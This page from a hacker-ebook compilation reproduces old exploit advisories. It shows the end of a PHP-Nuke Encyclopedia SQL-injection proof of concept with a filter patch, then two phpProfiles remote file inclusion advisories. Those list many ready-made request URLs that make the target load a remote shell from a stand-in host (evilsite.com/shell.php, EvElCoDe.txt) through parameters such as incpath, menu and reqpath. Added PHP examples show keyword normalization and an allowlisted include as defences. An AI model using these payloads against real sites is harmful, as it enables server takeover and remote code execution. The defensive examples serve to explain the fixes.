
Hacker Professional Ebook part 418 potx


// With this PoC code I get the md5 hash of the first admin (God) of the nuke_authors table

// - How to fix it? More information?

// -

// You can find a patch on http://www.neosecurityteam.net/foro/

// Also, you can modify the line 143 of mainfile.php, adding one more protection like:

// ==[ mainfile.php old line (143) ]==========================

// [ ]

// if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR
//     stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR
//     stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR
//     stripos_clone($postString_64,'+union+')) {

// }

// [ ]

// ==[ end mainfile.php ]=====================================

// ==[ mainfile.php new line (143) ]==========================

// [ ]

// if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR
//     stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR
//     stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR
//     stripos_clone($postString_64,'+union+') OR stripos_clone($postString_64, '*/UNION ') OR
//     stripos_clone($postString_64, ' UNION/*')) {

// }

// [ ]

// ==[ end mainfile.php ]=====================================

// That's a momentary solution to the problem. I recommend to download the PHP Nuke 8.0 version in the next days... it is not free at the moment

// - References

// -

// http://www.neosecurityteam.net/index.php?action=advisories&id=27

// - Credits

// -

// Anti SQL Injection protection bypass by Paisterist -> paisterist.nst [at] gmail [dot] com

// SQL Injection vulnerability in Encyclopedia module discovered by Paisterist -> paisterist.nst [at] gmail [dot] com

// Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com

// [N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/

// - Greets

// -

// HaCkZaTaN

// K4P0

// Daemon21

// Link

// 0m3gA_x

// LINUX

// nitrous

// m0rpheus

// nikyt0x

// KingMetal

// Knightmare

// Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!

?>

Black_hat_cr(HCE)
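
The following is an added example, not part of the original post and not PHP-Nuke code. It compares the literal substring checks quoted from line 143 (old and new) with a check that decodes and normalizes the input before looking for the keyword. It uses PHP's built-in stripos in place of stripos_clone and applies the signatures to a single string, ignoring the $postString / $postString_64 split; the sample inputs are constructed from the signature strings in the advisory.

```php
<?php
// Added example, not PHP-Nuke code. All inputs are constructed and reuse only
// the signature strings quoted in the advisory above.

// Distinct literals checked by the old line 143.
const OLD_SIGNATURES = ['%20union%20', '*/union/*', ' union ', '+union+'];
// Literals after the advisory's change.
const NEW_SIGNATURES = ['%20union%20', '*/union/*', ' union ', '+union+', '*/UNION ', ' UNION/*'];

/** Case-insensitive substring test, the approach taken by line 143. */
function literal_match(string $input, array $signatures): bool
{
    foreach ($signatures as $sig) {
        if (stripos($input, $sig) !== false) {   // position 0 is a hit, so compare with false
            return true;
        }
    }
    return false;
}

/** Decode and collapse separators first, then look for the keyword once. */
function normalized_match(string $input): bool
{
    $s = $input;
    for ($i = 0; $i < 3; $i++) {                 // undo up to three layers of URL encoding
        $decoded = urldecode($s);                // also turns '+' into a space
        if ($decoded === $s) {
            break;
        }
        $s = $decoded;
    }
    $s = preg_replace('~/\*.*?\*/~s', ' ', $s) ?? $s;   // complete /* ... */ comments
    $s = str_replace(['/*', '*/'], ' ', $s);            // leftover comment delimiters
    $s = preg_replace('/\s+/', ' ', $s) ?? $s;          // tabs, newlines, runs of spaces
    return preg_match('/\bunion\b/i', $s) === 1;
}

$samples = ['id=1 union x', 'id=1*/UNION x', 'id=1 UNION/*x', 'title=reunion'];
foreach ($samples as $in) {
    printf("%-16s old=%d new=%d normalized=%d\n", $in,
        literal_match($in, OLD_SIGNATURES),
        literal_match($in, NEW_SIGNATURES),
        normalized_match($in));
}
```

A keyword filter of either kind still flags harmless text that contains the word and remains, as the advisory says, a momentary measure; the query itself should use bound parameters.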

phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities


PHP Code:

#==================================================================

# phpProfiles (RFI)

#==================================================================

# Info:-

#

# Scripts: phpProfiles

# download : http://sourceforge.net/project/showfiles.php?group_id=176310

# Version : v.2.1 Beta

# Dork & vuln : download scripts and think :)

#

#==================================================================

#Exploit :

#

#http://localhost/path/users/include/body.inc.php?reqpath=http://EvElCoDe.txt?

#http://localhost/path/users/include/body_blog.inc.php?reqpath=http://EvElCoDe.txt?

#http://localhost/path/users/include/upload_ht.inc.php?usrinc=http://EvElCoDe.txt?

#

#==================================================================

#Discovered By : v1per-haCker

#

#Contact : v1per-hacker[at]hotmail.com

#

#XP10_hackEr Team >> www.xp10.com

#SpeciaL PoweR SecuritY TeaM >> www.specialpower.org

#

#Greetz to : | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |

# | ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |

# | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota |

# | Jean | CoDeR |

#

# Thanks >> /str0ke & www.milw0rm.com & www.google.com

#==================================================================

# milw0rm.com [2006-10-30]


sexyvirus(HCE)

phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities

Code:

+ -

+ phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities

+ -

+ Affected Software : phpProfiles <= 3.1.2b

+ Download : http://downloads.sourceforge.net/phpprofiles/phpProfiles_3_1_2.zip

+ Description : "phpProfiles allows you to offer visitors their very own URL on your web site simply by registering"

+ Class : Remote File Inclusion

+ Risk : High (Remote File Execution)

+ Found By : nuffsaid <nuffsaid[at]newbslove.us>

+ -

+ Details:

+ phpProfiles has several scripts which do not initialize variables before using them to

+ include files, assuming register_globals = on, we can initialize any one of the variables

+ in a query string and include a remote file of our choice

+

+ Vulnerable Code:

+ include/remove_pic.inc.php line(s) 11: include("$scriptpath/redirect.php");

+ include/body_admin.inc.php line(s) 03: <p><?include("$menu");?></p>

+ include/account.inc.php, line(s) 09: include("$incpath/footer.inc.php");

+ include/index.inc.php, line(s) 05: include("$incpath/adminerr.inc.php");

+ see below for a list of files affected

+

+ Proof Of Concept:

+ http://[target]/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php

+ http://[target]/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php

+ http://[target]/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php?

+ http://[target]/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?
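
The following is an added example, not part of the original advisory and not phpProfiles code. It shows the include pattern described under "Details" rewritten so that the path never depends on a request-supplied variable: the base directory is fixed in code, the file name must be on an allowlist, and the resolved path must stay inside the include directory. The directory, constants, helper name and allowlist are hypothetical.

```php
<?php
// Added example, not phpProfiles code. Paths, constants and file names are hypothetical.
// php.ini side: register_globals = Off (the directive was removed in PHP 5.4)
//               allow_url_include = Off

define('APP_ENTRY', true);   // include files can refuse to run without this marker
$incRoot = sys_get_temp_dir() . '/inc_demo_' . getmypid();   // constructed demo directory
mkdir($incRoot);
file_put_contents("$incRoot/footer.inc.php",
    "<?php if (!defined('APP_ENTRY')) { http_response_code(403); exit; }\necho \"footer\\n\";\n");

// Files that may be included by name (hypothetical list).
const ALLOWED_INCLUDES = ['footer.inc.php', 'adminerr.inc.php', 'redirect.php'];

/** Return the absolute path for an allowed include, or null if the name is rejected. */
function resolve_include(string $root, string $name): ?string
{
    if (!in_array($name, ALLOWED_INCLUDES, true)) {
        return null;                       // not on the allowlist: URLs, other paths, typos
    }
    $rootReal = realpath($root);
    $path     = realpath($root . '/' . $name);
    if ($rootReal === false || $path === false) {
        return null;                       // file does not exist
    }
    // The resolved file must sit directly under the include root.
    return dirname($path) === $rootReal ? $path : null;
}

// The path is built from a value fixed in code, so a request parameter named
// incpath, menu, reqpath or usrinc has no influence on what gets included.
$requests = ['footer.inc.php', 'http://example.invalid/file.txt?', 'adminerr.inc.php'];
foreach ($requests as $name) {
    $path = resolve_include($incRoot, $name);
    if ($path === null) {
        echo "rejected: $name\n";
        continue;
    }
    require $path;
}

unlink("$incRoot/footer.inc.php");
rmdir($incRoot);
```

The guard written into footer.inc.php is the second half of the fix: an include file requested directly over HTTP exits before any include statement runs.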

Date posted: 04/07/2014, 12:20
